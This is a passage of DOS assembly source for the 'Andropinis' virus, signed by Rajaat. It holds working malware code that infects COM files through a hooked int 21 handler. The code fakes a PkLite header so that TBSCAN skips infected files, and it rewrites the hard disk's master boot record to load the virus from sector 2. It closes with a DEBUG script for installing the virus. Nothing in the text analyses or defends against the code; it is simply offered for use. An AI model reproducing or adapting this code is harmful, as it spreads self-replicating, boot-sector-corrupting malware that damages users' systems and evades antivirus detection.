int 2f ; belongs to the handle in bx
mov bl,byte ptr es:[di] ;
mov ax,1216 ;
int 2f ;
mov bx,2020 ; check if the file has a com
mov ax,word ptr es:[di+28] ; extension
or ax,bx ;
cmp ax,'oc' ;
jne not_suitable ;
mov al,byte ptr es:[di+2a] ;
or al,bl ;
cmp al,'m' ;
jne not_suitable ;
cmp word ptr es:[di+11],0 ; check if file length is
jne not_suitable ; zero
cmp cx,1000 ; check if piece of code is
jb not_suitable ; not too short or too long
cmp cx,0f000 ;
ja not_suitable ;
pop es ; these registers are done
pop di ;
pop dx ;
mov bx,dx ; check if the file is a
cmp word ptr ds:[bx],'ZM' ; renamed exe file
je is_renamed_exe ;
cmp word ptr ds:[bx+2],0e990 ; check if already infected
jne infect_com ;
jmp is_renamed_exe
not_suitable: pop es ; done with this interrupt
pop di ; service routine, so chain
pop dx ; to the old 21 routine
is_renamed_exe: pop bx ;
pop ax ;
jmp eoi_21 ;
;******************************************************************************
; piece of code that infects a COM file
;******************************************************************************
infect_com: pop bx ; this register was done
push cx ; get the first 6 bytes of the
push si ; host and overwrite them with
add cx,offset com_entry-6 ; the new bytes. it places a
mov si,dx ; nifty piece of code to
mov ax,'KP' ; render tbscans heuristics
xchg word ptr [si],ax ; useless. the PUSH AX, DEC BX
mov word ptr cs:org_com,ax ; (PK) in the begin of the
lodsw ; program makes tbscan think
mov ax,0e990 ; it is a PkLite compressed
xchg word ptr ds:[si],ax ; file and will skip it!
mov word ptr cs:org_com+2,ax ;
lodsw ;
xchg word ptr ds:[si],cx ;
mov word ptr cs:org_com+4,cx ;
pop si ;
pop cx ;
pop ax ; perform original write
pushf ; command
call dword ptr cs:[old_21] ;
push ax ; and append the virus at the
push cx ; end of the file
push dx ;
push ds ;
push cs ;
pop ds ;
mov ah,40 ;
mov cx,virus_length_b ;
lea dx,virus ;
pushf ;
call dword ptr cs:[old_21] ;
pop ds ;
pop dx ;
pop cx ;
pop ax ;
retf 2 ;
;******************************************************************************
; this gets executed by an infected COM file
;******************************************************************************
com_entry: call get_offset ; old hat for getting the
get_offset: pop bp ; delta offset
sub bp,offset get_offset ;
mov ax,5001 ; if the virus is resident it
int 13 ; doesn't need to infect the
cmp ax,0150 ; master boot record
je is_active ;
mov ax,0201 ; read master boot record.
lea bx,heap[bp] ; if an error occured, goto
mov cx,1 ; is_active
mov dx,80 ;
int 13 ;
jc is_active ;
cmp word ptr [bx+1be+1],0101 ; test if the partition begins
jne is_active ; at the normal sector
test byte ptr [bx+1be],80 ; test of the partition is
jz is_active ; bootable
mov al,byte ptr [bx+1be+4] ; test if the partition type
cmp al,4 ; is ok
jb is_active ;
cmp al,6 ;
ja is_active ;
mov word ptr [bx+1be+1],200 ; change pointer to virus code
mov ax,0301 ; write back the master boot
push ax ; record. quit if error
int 13 ; occured
pop ax ;
jc is_active ;
inc cx ; write virus to sector 2
lea bx,virus[bp] ; (right behind the mbr)
int 13 ;
is_active: lea si,org_com[bp] ; restore beginning of the
mov di,100 ; host and execute it
pop ax ;
push cs ;
push di ;
movsw ;
movsw ;
movsw ;
retf ;
;******************************************************************************
; some data used by the virus
;******************************************************************************
db '[Andropinis]' ; my childs name
db ' by Rajaat',0 ; my name
org 1fe ; for the bootsector
db 55,0aa ; boot signature
;******************************************************************************
; the things below aren't copied into the viral boot sector, only in COM files
;******************************************************************************
org_com equ $ ; original program data
heap equ $+6 ; memory for data
virus_length_b equ heap-virus ; who says size doesn't count?
virus_length_s equ (virus_length_b+1ff) / 200 ;
virus_length_k equ (virus_length_b+3ff) / 400 ;
old_13 equ heap+6 ; old int 13 vector
old_21 equ heap+0a ; old int 21 vector
hook_21_flag equ heap+0e ; int 21 hook flag
end virus ; the end complete
end ;
;******************************************************************************
; remove the piece below if you use A86 instead of TASM, because it will
; choke on it
--- debug script for installing the Andropinis virus ---
install with
DEBUG ANDROPIN.BIN < scriptname
where scriptname is the name that you give to the mess below
--- cut here ---
m 100 l200 1000
a
mov ax,0201
mov bx,800
mov cx,1
mov dx,80
int 13
mov si,9bf
mov word ptr [si],200
mov ax,0301
mov dx,80
int 13
mov ax,0301
mov bx,1000
inc cx
int 13
int 20
g
q
--- cut here ---